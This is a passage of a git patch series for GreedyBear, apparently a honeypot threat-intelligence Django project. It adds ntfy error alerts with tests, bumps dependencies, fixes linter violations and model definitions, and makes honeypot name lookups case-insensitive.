+            view=ViewType.ENRICHMENT_VIEW.value,
             request_date=self.current_time,
         )
         self.assertEqual(self.statistic.source, "140.246.171.141")
-        self.assertEqual(self.statistic.view, viewType.ENRICHMENT_VIEW.value)
+        self.assertEqual(self.statistic.view, ViewType.ENRICHMENT_VIEW.value)
         self.assertEqual(self.statistic.request_date, self.current_time)
 
     def test_general_honeypot_model(self):
diff --git a/tests/test_rf_models.py b/tests/test_rf_models.py
index ea6d4b69..102517f8 100644
--- a/tests/test_rf_models.py
+++ b/tests/test_rf_models.py
@@ -90,11 +90,11 @@ def test_rf_regressor(self):
         for a, b in zip(training_target, REGRESSOR_TARGET, strict=False):
             self.assertEqual(a, b)
 
-        X_train, X_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
-        self.assertEqual(len(X_train), 4)
-        self.assertEqual(len(X_test), 1)
-        self.assertEqual(len(X_train), len(y_train))
-        self.assertEqual(len(X_test), len(y_test))
+        x_train, x_test, y_train, y_test = regressor.split_train_test(SAMPLE_DATA, training_target)
+        self.assertEqual(len(x_train), 4)
+        self.assertEqual(len(x_test), 1)
+        self.assertEqual(len(x_train), len(y_train))
+        self.assertEqual(len(x_test), len(y_test))
 
         df = regressor.score(SAMPLE_DATA)
         for a, b in zip(df["mock_score"], regressor.model.predict.return_value, strict=False):
diff --git a/tests/test_views.py b/tests/test_views.py
index 03acf9b2..f8cef307 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -3,7 +3,7 @@
 from rest_framework.test import APIClient
 
 from api.views.utils import is_ip_address, is_sha256hash
-from greedybear.models import GeneralHoneypot, Statistics, viewType
+from greedybear.models import GeneralHoneypot, Statistics, ViewType
 
 from . import CustomTestCase
 
@@ -270,8 +270,8 @@ class StatisticsViewTestCase(CustomTestCase):
     def setUpClass(cls):
         super().setUpClass()
         Statistics.objects.all().delete()
-        Statistics.objects.create(source="140.246.171.141", view=viewType.FEEDS_VIEW.value)
-        Statistics.objects.create(source="140.246.171.141", view=viewType.ENRICHMENT_VIEW.value)
+        Statistics.objects.create(source="140.246.171.141", view=ViewType.FEEDS_VIEW.value)
+        Statistics.objects.create(source="140.246.171.141", view=ViewType.ENRICHMENT_VIEW.value)
 
     @classmethod
     def tearDownClass(cls):

From 25b9706bd24c1d7e98233026d59a9b9141acc5c9 Mon Sep 17 00:00:00 2001
From: Varandani Harsh Pramod
 <76023663+HARSHVARANDANI@users.noreply.github.com>
Date: Mon, 5 Jan 2026 00:55:00 +0530
Subject: [PATCH 27/75] feat: ntfy alerts for monitor logs. Closes #664 (#667)

* feat: ntfy alerts for monitor logs. Closes #664

* refactor: changed function name to send_slack_message to improve code readability

* added formatting for ntfy alerts

* added a test for ntfy alerts feature

* removed redundant dependency

* added comments in env template

* formatting changes

* fix formatting

---------

Co-authored-by: Matteo Lodi <30625432+mlodic@users.noreply.github.com>
Co-authored-by: tim <tim.leonhard@posteo.de>
---
 docker/env_file_template            |  4 ++
 greedybear/cronjobs/monitor_logs.py |  9 ++-
 greedybear/ntfy.py                  | 31 +++++++++++
 greedybear/settings.py              |  1 +
 greedybear/slack.py                 |  2 +-
 tests/test_ntfy.py                  | 86 +++++++++++++++++++++++++++++
 6 files changed, 129 insertions(+), 4 deletions(-)
 create mode 100644 greedybear/ntfy.py
 create mode 100644 tests/test_ntfy.py

diff --git a/docker/env_file_template b/docker/env_file_template
index 2da34e56..890f102d 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -35,6 +35,10 @@ ELASTIC_ENDPOINT=
 SLACK_TOKEN=
 DEFAULT_SLACK_CHANNEL=
 
+NTFY_URL=
+# Url of the ntfy topic to recieve error alerts
+# Example: https://ntfy.sh/your_topic
+
 STAGE="production"
 DEBUG=False
 MOCK_CONNECTIONS=False
diff --git a/greedybear/cronjobs/monitor_logs.py b/greedybear/cronjobs/monitor_logs.py
index b6de87bb..efe7137c 100644
--- a/greedybear/cronjobs/monitor_logs.py
+++ b/greedybear/cronjobs/monitor_logs.py
@@ -4,7 +4,8 @@
 from pathlib import Path
 
 from greedybear.cronjobs.base import Cronjob
-from greedybear.slack import send_message
+from greedybear.ntfy import send_ntfy_message
+from greedybear.slack import send_slack_message
 
 
 class MonitorLogs(Cronjob):
@@ -27,7 +28,7 @@ def __init__(
         self.logs_to_monitor = ["greedybear", "api", "django", "celery"]
 
     def run(self):
-        """Check error logs for recent modifications and alert via Slack."""
+        """Check error logs for recent modifications and alert via Slack and ntfy."""
         cutoff_time = datetime.now() - timedelta(minutes=self.check_window_minutes)
         self.log.info(f"checking {len(self.logs_to_monitor)} error logs for activity since {cutoff_time}")
 
@@ -46,6 +47,8 @@ def run(self):
             if last_modified > cutoff_time:
                 message = f"found errors in log file {log_file}"
                 self.log.warning(message)
-                send_message(message)
+                send_slack_message(message)
+                message = f"**⚠️ GreedyBear Error**\n\nErrors detected in `{log_file}`"
+                send_ntfy_message(message)
             else:
                 self.log.debug(f"no recent activity in {log_file}")
diff --git a/greedybear/ntfy.py b/greedybear/ntfy.py
new file mode 100644
index 00000000..e361788d
--- /dev/null
+++ b/greedybear/ntfy.py
@@ -0,0 +1,31 @@
+import logging
+
+import requests
+from django.conf import settings
+
+logger = logging.getLogger(__name__)
+
+
+def send_ntfy_message(message):
+    if not settings.NTFY_URL:
+        logger.warning("ntfy is not configured, message not sent")
+        return
+
+    headers = {
+        "Title": "GreedyBear Error",
+        "Priority": "4",
+        "Tags": "warning",
+        "Markdown": "yes",
+    }
+
+    try:
+        response = requests.post(
+            settings.NTFY_URL,
+            data=message.encode("utf-8"),
+            headers=headers,
+            timeout=(1, 2),
+        )
+        response.raise_for_status()
+
+    except Exception as error:
+        logger.exception(error)
diff --git a/greedybear/settings.py b/greedybear/settings.py
index 565a1172..f9c592b8 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -51,6 +51,7 @@
 
 SLACK_TOKEN = os.environ.get("SLACK_TOKEN", "")
 DEFAULT_SLACK_CHANNEL = os.environ.get("DEFAULT_SLACK_CHANNEL", "")
+NTFY_URL = os.environ.get("NTFY_URL", "")
 
 VERSION = os.environ.get("REACT_APP_GREEDYBEAR_VERSION", "")
 
diff --git a/greedybear/slack.py b/greedybear/slack.py
index b820e1d8..1fef9687 100644
--- a/greedybear/slack.py
+++ b/greedybear/slack.py
@@ -8,7 +8,7 @@
 logger = logging.getLogger(__name__)
 
 
-def send_message(text):
+def send_slack_message(text):
     if not settings.SLACK_TOKEN:
         logger.warning("Slack is not configured, message not sent")
         return
diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
new file mode 100644
index 00000000..de4c7c9c
--- /dev/null
+++ b/tests/test_ntfy.py
@@ -0,0 +1,86 @@
+from unittest.mock import MagicMock, patch
+
+from django.test import SimpleTestCase, override_settings
+
+from greedybear.ntfy import send_ntfy_message
+
+TEST_LOGGING = {
+    "version": 1,
+    "disable_existing_loggers": True,
+}
+
+
+@override_settings(LOGGING=TEST_LOGGING)
+class SendNtfyMessageTests(SimpleTestCase):
+    @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+    @patch("greedybear.ntfy.requests.post")
+    @patch("greedybear.ntfy.logger")
+    def test_happy_path_successful_post(self, mock_logger, mock_post):
+        message = "Something went wrong"
+
+        mock_response = MagicMock()
+        mock_response.raise_for_status.return_value = None
+        mock_post.return_value = mock_response
+
+        send_ntfy_message(message)
+
+        mock_post.assert_called_once_with(
+            "https://ntfy.sh/greedybear",
+            data=message.encode("utf-8"),
+            headers={
+                "Title": "GreedyBear Error",
+                "Priority": "4",
+                "Tags": "warning",
+                "Markdown": "yes",
+            },
+            timeout=(1, 2),
+        )
+        mock_logger.exception.assert_not_called()
+
+    @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+    @patch("greedybear.ntfy.requests.post")
+    def test_happy_path_non_ascii_message(self, mock_post):
+        message = "⚠️ Über-alert"
+
+        mock_response = MagicMock()
+        mock_response.raise_for_status.return_value = None
+        mock_post.return_value = mock_response
+
+        send_ntfy_message(message)
+
+        _, kwargs = mock_post.call_args
+        self.assertEqual(kwargs["data"], message.encode("utf-8"))
+
+    @override_settings(NTFY_URL="")
+    @patch("greedybear.ntfy.requests.post")
+    @patch("greedybear.ntfy.logger")
+    def test_no_url_configured_logs_warning_and_skips_post(self, mock_logger, mock_post):
+        send_ntfy_message("anything")
+
+        mock_post.assert_not_called()
+        mock_logger.warning.assert_called_once_with("ntfy is not configured, message not sent")
+
+    @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+    @patch("greedybear.ntfy.requests.post")
+    @patch("greedybear.ntfy.logger")
+    def test_http_error_logged_but_not_raised(self, mock_logger, mock_post):
+        error = Exception("HTTP 500")
+
+        mock_response = MagicMock()
+        mock_response.raise_for_status.side_effect = error
+        mock_post.return_value = mock_response
+
+        send_ntfy_message("msg")
+
+        mock_logger.exception.assert_called_once_with(error)
+
+    @override_settings(NTFY_URL="https://ntfy.sh/greedybear")
+    @patch("greedybear.ntfy.requests.post")
+    @patch("greedybear.ntfy.logger")
+    def test_network_error_logged_but_not_raised(self, mock_logger, mock_post):
+        error = TimeoutError("timeout")
+        mock_post.side_effect = error
+
+        send_ntfy_message("msg")
+
+        mock_logger.exception.assert_called_once_with(error)

From e79c0306628855fa8b4502659169a84c067eaf28 Mon Sep 17 00:00:00 2001
From: tim <tim.leonhard@posteo.de>
Date: Sun, 4 Jan 2026 22:40:56 +0100
Subject: [PATCH 28/75] Bump celery from 5.6.1 to 5.6.2 in /requirements.
 Closes #680

---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 3b05f326..20dc8eca 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,4 +1,4 @@
-celery==5.6.1
+celery==5.6.2
 
 # if you change this, update the documentation
 elasticsearch8==8.19.3

From a7394ffb1d5bef15a33c1fcd9107e22057ee2a70 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 6 Jan 2026 01:03:17 +0530
Subject: [PATCH 29/75] refactor: fix flake8-bugbear violations
 (B006/B008/B017/B023/B904). Closes #677 (#679)

* refactor: fix mutable default arguments (B006/B008)

- Replace empty list defaults with None in _create_mock_ioc()
- Replace datetime.now() call in default argument with None
- Initialize mutable defaults inside function to avoid shared state
- Fixes flake8-bugbear violations B006 and B008

Phase 1 of bugbear violations fix. All tests passing (282/282).

* refactor: fix exception handling (B017/B904)

- Add 'from None' to LoginSerializer to suppress exception context
  when re-raising ValidationError (intentionally hiding user existence)
- Add 'from e' to CowrieSessionRepository to preserve exception chain
  when raising descriptive ValueError
- Replace bare Exception with IntegrityError in test for database
  constraint violations

Phase 2 of bugbear violations fix. All tests passing (282/282).

* refactor: fix lambda loop variable binding (B023)

- Add default argument to lambda in multi_label_encode to capture
  loop variable correctly
- Prevents late binding issue where all lambdas would reference the
  final loop value instead of capturing each iteration's value

Phase 3 of bugbear violations fix. All tests passing (282/282).

* refactor: enable bugbear rules in ruff config

- Remove B006, B008, B017, B023, and B904 from ignore list
- All bugbear violations have been fixed in previous commits
- Enforces proper exception handling, mutable defaults, and lambda patterns

Phase 4 (final) of bugbear violations fix. All tests passing (282/282).
All ruff checks passing.

* refactor: use ternary operators for cleaner code

Use ternary operators directly in mock assignments instead of
separate if-else blocks for a more concise and Pythonic approach.

Co-authored-by: regulartim
---
 .github/configurations/python_linters/.ruff.toml |  9 ---------
 authentication/serializers.py                    |  6 +++---
 .../cronjobs/repositories/cowrie_session.py      |  4 ++--
 greedybear/cronjobs/scoring/utils.py             |  2 +-
 tests/__init__.py                                | 16 ++++++++--------
 tests/test_repositories.py                       |  4 +++-
 6 files changed, 17 insertions(+), 24 deletions(-)

diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index d51a6a7a..c657491a 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -53,15 +53,6 @@ select = [
 ignore = [
     # F403: Allow wildcard imports in __init__.py files
     "F403",
-    # B006/B008: Allow mutable defaults and function calls in defaults for test helpers
-    "B006",
-    "B008",
-    # B017: Allow blind exception in tests  
-    "B017",
-    # B023: Allow loop variable in lambda (functional style)
-    "B023",
-    # B904: Allow raise without from (intentional re-raise)
-    "B904",
     # C401/C408: Allow dict() and generator patterns (style preference)
     "C401",
     "C408",
diff --git a/authentication/serializers.py b/authentication/serializers.py
index bece6cad..960a7bab 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -147,8 +147,8 @@ def validate(self, attrs):
                 user = User.objects.get(username=attrs["username"])
             except User.DoesNotExist:
                 # we do not want to leak info
-                # so just raise the original exception
-                raise exc
+                # so just raise the original exception without context
+                raise exc from None
             else:
                 # custom error messages
                 if not user.is_active:
@@ -160,4 +160,4 @@ def validate(self, attrs):
                         exc.detail = "Your account was declined."
                     logger.info(f"User {user} is not active. Error message: {exc.detail}")
             # else
-            raise exc
+            raise exc from None
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index 49eb5e87..f8003859 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -27,8 +27,8 @@ def get_or_create_session(self, session_id: str, source: IOC) -> CowrieSession:
         """
         try:
             pk = int(session_id, 16)
-        except ValueError:
-            raise ValueError(f"session_id must be a valid hex string, got: {session_id!r}")
+        except ValueError as e:
+            raise ValueError(f"session_id must be a valid hex string, got: {session_id!r}") from e
         record, created = CowrieSession.objects.get_or_create(session_id=pk, defaults={"source": source})
         self.log.debug(f"created new session {session_id}" if created else f"{session_id} already exists")
         return record
diff --git a/greedybear/cronjobs/scoring/utils.py b/greedybear/cronjobs/scoring/utils.py
index 232df1ef..878554e2 100644
--- a/greedybear/cronjobs/scoring/utils.py
+++ b/greedybear/cronjobs/scoring/utils.py
@@ -123,7 +123,7 @@ def multi_label_encode(df: pd.DataFrame, column_name: str) -> pd.DataFrame:
     for value_list in df[column_name]:
         unique_values.update(value_list)
     for value in sorted(unique_values):
-        result_df[f"has_{value}"] = df[column_name].apply(lambda x: 1 if value in x else 0)
+        result_df[f"has_{value}"] = df[column_name].apply(lambda x, value=value: 1 if value in x else 0)
     return result_df.drop(column_name, axis=1)
 
 
diff --git a/tests/__init__.py b/tests/__init__.py
index 0bf0a52f..6cb71ac9 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -198,11 +198,11 @@ def _create_mock_ioc(
         ioc_type="ip",
         attack_count=1,
         interaction_count=1,
-        related_urls=[],
-        destination_ports=[],
+        related_urls=None,
+        destination_ports=None,
         login_attempts=0,
-        days_seen=[],
-        last_seen=datetime.now(),
+        days_seen=None,
+        last_seen=None,
         ip_reputation="",
         asn=1234,
     ):
@@ -213,11 +213,11 @@ def _create_mock_ioc(
         mock.payload_request = False
         mock.attack_count = attack_count
         mock.interaction_count = interaction_count
-        mock.related_urls = related_urls
-        mock.destination_ports = destination_ports
-        mock.days_seen = days_seen
+        mock.related_urls = related_urls if related_urls is not None else []
+        mock.destination_ports = destination_ports if destination_ports is not None else []
+        mock.days_seen = days_seen if days_seen is not None else []
         mock.login_attempts = login_attempts
-        mock.last_seen = last_seen
+        mock.last_seen = last_seen if last_seen is not None else datetime.now()
         mock.ip_reputation = ip_reputation
         mock.asn = asn
         mock.number_of_days_seen = len(mock.days_seen)
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index c30f655c..2aa7526d 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,6 +1,8 @@
 from datetime import datetime
 from unittest.mock import Mock, patch
 
+from django.db import IntegrityError
+
 from greedybear.cronjobs.repositories import (
     CowrieSessionRepository,
     ElasticRepository,
@@ -288,7 +290,7 @@ def test_get_or_create_session_with_hex_session_id(self):
 
     def test_command_sequence_unique_hash_constraint(self):
         existing = self.command_sequence
-        with self.assertRaises(Exception):
+        with self.assertRaises(IntegrityError):
             CommandSequence.objects.create(
                 commands=["different", "commands"],
                 commands_hash=existing.commands_hash,

From 6194db4648e0a4c8e069901314738e06d2f21743 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 6 Jan 2026 16:31:02 +0530
Subject: [PATCH 30/75] refactor: fix flake8-django violations
 (DJ001/DJ008/DJ012). Closes #681 (#684)

* refactor: add __str__ methods and fix field ordering (DJ008/DJ012)

- Add __str__ to UserProfile, Sensor, FireHolList, CowrieSession,
  Statistics, MassScanner, and WhatsMyIPDomain models
- Move UserProfile fields before Meta class (DJ012)
- Improves admin interface usability and debugging

Phase 1 of Django violations fix. All tests passing (282/282).

* refactor: fix CharField null=True violations (DJ001)

- Replace null=True with blank=True, default='' on FireHolList.source
  and MassScanner.reason fields
- Filter empty source strings in get_firehol_categories to prevent
  empty values in firehol_categories list
- Create database migration to update schema

Phase 2 of Django violations fix. All tests passing (282/282).

* refactor: enable Django violations checks in ruff config

- Remove DJ001, DJ008, and DJ012 from ignore list
- All Django model violations have been fixed in previous commits
- Enforces Django best practices for CharField, __str__, and field ordering

Phase 3 (final) of Django violations fix. All tests passing (282/282).
All ruff checks passing.
---
 .../configurations/python_linters/.ruff.toml  |  6 -----
 authentication/models.py                      | 14 ++++++-----
 greedybear/cronjobs/extraction/utils.py       |  6 +++--
 .../0026_fix_charfield_null_true.py           | 23 +++++++++++++++++++
 greedybear/models.py                          | 22 ++++++++++++++++--
 5 files changed, 55 insertions(+), 16 deletions(-)
 create mode 100644 greedybear/migrations/0026_fix_charfield_null_true.py

diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index c657491a..3b513404 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -56,12 +56,6 @@ ignore = [
     # C401/C408: Allow dict() and generator patterns (style preference)
     "C401",
     "C408",
-    # DJ001: Allow null=True on CharField (intentional for optional fields)
-    "DJ001",
-    # DJ008: Allow models without __str__ (legacy models, API-only)
-    "DJ008",
-    # DJ012: Allow existing Django model field ordering
-    "DJ012",
     # E501: Allow long lines in docstrings
     "E501",
 
diff --git a/authentication/models.py b/authentication/models.py
index f9806f2a..ec6f6bf7 100644
--- a/authentication/models.py
+++ b/authentication/models.py
@@ -18,15 +18,10 @@ class DiscoverFromChoices(models.TextChoices):
 
 # models
 class UserProfile(models.Model):
-    # meta
-    class Meta:
-        verbose_name_plural = "User Profiles"
-
-    # contants
+    # constants
     DiscoverFromChoices = DiscoverFromChoices
 
     # fields
-
     user = models.OneToOneField(
         settings.AUTH_USER_MODEL,
         on_delete=models.CASCADE,
@@ -40,3 +35,10 @@ class Meta:
         choices=DiscoverFromChoices.choices,
         default=DiscoverFromChoices.OTHER,
     )
+
+    # meta
+    class Meta:
+        verbose_name_plural = "User Profiles"
+
+    def __str__(self):
+        return f"{self.user.username} - {self.company_name}"
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 5ca11253..b176ec79 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -68,7 +68,8 @@ def get_firehol_categories(ip: str, extracted_ip) -> list[str]:
 
     # First check for exact IP match (for .ipset files)
     exact_matches = FireHolList.objects.filter(ip_address=ip).values_list("source", flat=True)
-    firehol_categories.extend(exact_matches)
+    # Filter out empty strings (from default='')
+    firehol_categories.extend([source for source in exact_matches if source])
 
     # Then check if IP is within any network ranges (for .netset files)
     # Only query entries that contain '/' (CIDR notation)
@@ -76,7 +77,8 @@ def get_firehol_categories(ip: str, extracted_ip) -> list[str]:
     for entry in network_entries:
         try:
             network_range = ip_network(entry.ip_address, strict=False)
-            if extracted_ip in network_range and entry.source not in firehol_categories:
+            # Check entry.source is not empty and not already in list
+            if extracted_ip in network_range and entry.source and entry.source not in firehol_categories:
                 firehol_categories.append(entry.source)
         except (ValueError, IndexError):
             # Not a valid network range, skip
diff --git a/greedybear/migrations/0026_fix_charfield_null_true.py b/greedybear/migrations/0026_fix_charfield_null_true.py
new file mode 100644
index 00000000..96356db6
--- /dev/null
+++ b/greedybear/migrations/0026_fix_charfield_null_true.py
@@ -0,0 +1,23 @@
+# Generated by Django 5.2.9 on 2026-01-06 09:35
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ('greedybear', '0025_merge_20251223_2100'),
+    ]
+
+    operations = [
+        migrations.AlterField(
+            model_name='firehollist',
+            name='source',
+            field=models.CharField(blank=True, default='', max_length=64),
+        ),
+        migrations.AlterField(
+            model_name='massscanner',
+            name='reason',
+            field=models.CharField(blank=True, default='', max_length=64),
+        ),
+    ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 77c68e33..6221e58f 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -21,6 +21,9 @@ class IocType(models.TextChoices):
 class Sensor(models.Model):
     address = models.CharField(max_length=15, blank=False)
 
+    def __str__(self):
+        return self.address
+
 
 class GeneralHoneypot(models.Model):
     name = models.CharField(max_length=15, blank=False)
@@ -33,13 +36,16 @@ def __str__(self):
 class FireHolList(models.Model):
     ip_address = models.CharField(max_length=256, blank=False)
     added = models.DateTimeField(blank=False, default=datetime.now)
-    source = models.CharField(max_length=64, blank=True, null=True)
+    source = models.CharField(max_length=64, blank=True, default="")
 
     class Meta:
         indexes = [
             models.Index(fields=["ip_address"]),
         ]
 
+    def __str__(self):
+        return f"{self.ip_address} ({self.source or 'unknown'})"
+
 
 class IOC(models.Model):
     name = models.CharField(max_length=256, blank=False)
@@ -114,6 +120,9 @@ class Meta:
             models.Index(fields=["source"]),
         ]
 
+    def __str__(self):
+        return f"Session {hex(self.session_id)[2:]} from {self.source.name}"
+
 
 class Statistics(models.Model):
     source = models.CharField(max_length=15, blank=False)
@@ -125,17 +134,23 @@ class Statistics(models.Model):
     )
     request_date = models.DateTimeField(blank=False, default=datetime.now)
 
+    def __str__(self):
+        return f"{self.source} - {self.view} ({self.request_date.strftime('%Y-%m-%d %H:%M')})"
+
 
 class MassScanner(models.Model):
     ip_address = models.CharField(max_length=256, blank=False)
     added = models.DateTimeField(blank=False, default=datetime.now)
-    reason = models.CharField(max_length=64, blank=True, null=True)
+    reason = models.CharField(max_length=64, blank=True, default="")
 
     class Meta:
         indexes = [
             models.Index(fields=["ip_address"]),
         ]
 
+    def __str__(self):
+        return f"{self.ip_address}{f' ({self.reason})' if self.reason else ''}"
+
 
 class WhatsMyIPDomain(models.Model):
     domain = models.CharField(max_length=256, blank=False)
@@ -145,3 +160,6 @@ class Meta:
         indexes = [
             models.Index(fields=["domain"]),
         ]
+
+    def __str__(self):
+        return self.domain

From 1eece9912fcaa002ec74a4f98a106e944c857d41 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 8 Jan 2026 08:26:25 +0100
Subject: [PATCH 31/75] Bump django-ses from 4.5.0 to 4.6.0 in /requirements
 (#686)

Bumps [django-ses](https://github.com/django-ses/django-ses) from 4.5.0 to 4.6.0.
- [Release notes](https://github.com/django-ses/django-ses/releases)
- [Changelog](https://github.com/django-ses/django-ses/blob/main/CHANGES.md)
- [Commits](https://github.com/django-ses/django-ses/compare/v4.5.0...v4.6.0)

---
updated-dependencies:
- dependency-name: django-ses
  dependency-version: 4.6.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 20dc8eca..bdb889e0 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -6,7 +6,7 @@ elasticsearch8==8.19.3
 Django==5.2.9
 djangorestframework==3.16.1
 django-rest-email-auth==5.0.0
-django-ses==4.5.0
+django-ses==4.6.0
 
 psycopg2-binary==2.9.11
 

From 0b9623298fb43036bc2afe9e34e4016ed67cb511 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 8 Jan 2026 08:26:57 +0100
Subject: [PATCH 32/75] Bump django from 5.2.9 to 5.2.10 in /requirements
 (#688)

Bumps [django](https://github.com/django/django) from 5.2.9 to 5.2.10.
- [Commits](https://github.com/django/django/compare/5.2.9...5.2.10)

---
updated-dependencies:
- dependency-name: django
  dependency-version: 5.2.10
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index bdb889e0..bf6f63a3 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -3,7 +3,7 @@ celery==5.6.2
 # if you change this, update the documentation
 elasticsearch8==8.19.3
 
-Django==5.2.9
+Django==5.2.10
 djangorestframework==3.16.1
 django-rest-email-auth==5.0.0
 django-ses==4.6.0

From fc5b5f1d5f0993611e479261e107d87e37b5be0e Mon Sep 17 00:00:00 2001
From: Drona Raj Gyawali <dronarajgyawali@gmail.com>
Date: Thu, 8 Jan 2026 15:54:48 +0545
Subject: [PATCH 33/75] refactor:honeypot extraction using DB-driven exclusion.
 closes #631 (#670)

* refactor:honeypot extraction using DB-driven exclusion

* feat/refactor: added migration file and changes in extraction

* refactor: DB creation behavior is deferred

* fix(ioc): restore create_honeypot in is_ready_for_extraction and normalize cache keys

* test(repo): Add case-insensitive tests for honeypot extraction

* resolve: conflict

* add test for insesitive honeypot retrieval

* refactor(repo): implement insensitive lookup in get_hp_by_name

---------

Co-authored-by: tim <tim.leonhard@posteo.de>
---
 greedybear/cronjobs/repositories/ioc.py       | 24 +++++++-----
 .../0027_disable_unwanted_honeypots.py        | 34 +++++++++++++++++
 tests/test_repositories.py                    | 37 ++++++++++++++++---
 3 files changed, 80 insertions(+), 15 deletions(-)
 create mode 100644 greedybear/migrations/0027_disable_unwanted_honeypots.py

diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 0f40a9fb..f9ef046b 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -16,8 +16,12 @@ class IocRepository:
     def __init__(self):
         """Initialize the repository and populate the honeypot cache from the database."""
         self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
-        self._honeypot_cache = {hp.name: hp.active for hp in GeneralHoneypot.objects.all()}
-        self._honeypot_cache.update(dict.fromkeys(self.SPECIAL_HONEYPOTS, True))
+        self._honeypot_cache = {self._normalize_name(hp.name): hp.active for hp in GeneralHoneypot.objects.all()}
+        self._honeypot_cache.update({self._normalize_name(name): True for name in self.SPECIAL_HONEYPOTS})
+
+    def _normalize_name(self, name: str) -> str:
+        """Normalize honeypot names for consistent cache and DB usage."""
+        return name.lower().strip()
 
     def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
         """
@@ -47,10 +51,11 @@ def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
         Returns:
             The newly created GeneralHoneypot instance.
         """
+        normalized = self._normalize_name(honeypot_name)
         self.log.debug(f"creating honeypot {honeypot_name}")
         honeypot = GeneralHoneypot(name=honeypot_name, active=True)
         honeypot.save()
-        self._honeypot_cache[honeypot_name] = True
+        self._honeypot_cache[normalized] = True
         return honeypot
 
     def get_active_honeypots(self) -> list[GeneralHoneypot]:
@@ -87,10 +92,7 @@ def get_hp_by_name(self, name: str) -> GeneralHoneypot | None:
         Returns:
             The matching GeneralHoneypot, or None if not found.
         """
-        try:
-            return GeneralHoneypot.objects.get(name=name)
-        except GeneralHoneypot.DoesNotExist:
-            return None
+        return GeneralHoneypot.objects.filter(name__iexact=name).first()
 
     def is_empty(self) -> bool:
         """
@@ -113,12 +115,13 @@ def is_enabled(self, honeypot_name: str) -> bool:
         Returns:
             True if the honeypot is enabled, False otherwise.
         """
-        return self._honeypot_cache.get(honeypot_name, False)
+        normalized = self._normalize_name(honeypot_name)
+        return self._honeypot_cache.get(normalized, False)
 
     def is_ready_for_extraction(self, honeypot_name: str) -> bool:
         """
         Check if a honeypot is ready for data extraction.
-        Creates the honeypot if it doesn't exist, then checks if it's enabled.
+        Loads the honeypot if it doesn't exist, then checks if it's enabled.
 
         Args:
             honeypot_name: Name of the honeypot to check.
@@ -126,7 +129,8 @@ def is_ready_for_extraction(self, honeypot_name: str) -> bool:
         Returns:
             True if the honeypot exists and is enabled, False otherwise.
         """
-        if honeypot_name not in self._honeypot_cache:
+        normalized = self._normalize_name(honeypot_name)
+        if normalized not in self._honeypot_cache:
             self.create_honeypot(honeypot_name)
         return self.is_enabled(honeypot_name)
 
diff --git a/greedybear/migrations/0027_disable_unwanted_honeypots.py b/greedybear/migrations/0027_disable_unwanted_honeypots.py
new file mode 100644
index 00000000..0b547db7
--- /dev/null
+++ b/greedybear/migrations/0027_disable_unwanted_honeypots.py
@@ -0,0 +1,34 @@
+from django.db import migrations
+
+
+def disable_unwanted_honeypots(apps, schema_editor):
+    """
+    Ensure unwanted honeypots exist and are disabled.
+    """
+    GeneralHoneypot = apps.get_model("greedybear", "GeneralHoneypot")
+
+    unwanted = [
